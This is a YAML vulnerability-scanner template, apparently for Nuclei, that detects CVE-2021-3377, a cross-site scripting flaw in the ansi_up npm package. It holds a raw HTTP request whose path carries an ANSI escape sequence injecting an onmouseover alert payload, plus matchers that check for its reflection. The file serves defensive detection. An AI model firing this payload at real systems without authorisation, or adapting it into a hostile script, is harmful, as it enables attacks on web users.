29 lines
952 B
YAML
29 lines
952 B
YAML
id: CVE-2021-3377
|
|
|
|
info:
|
|
name: Ansi_up XSS
|
|
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
|
|
reference:
|
|
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
|
|
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
|
author: geeknik
|
|
severity: medium
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
|
|
unsafe: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
words:
|
|
- "com\"/onmouseover=\"alert(1)\">" |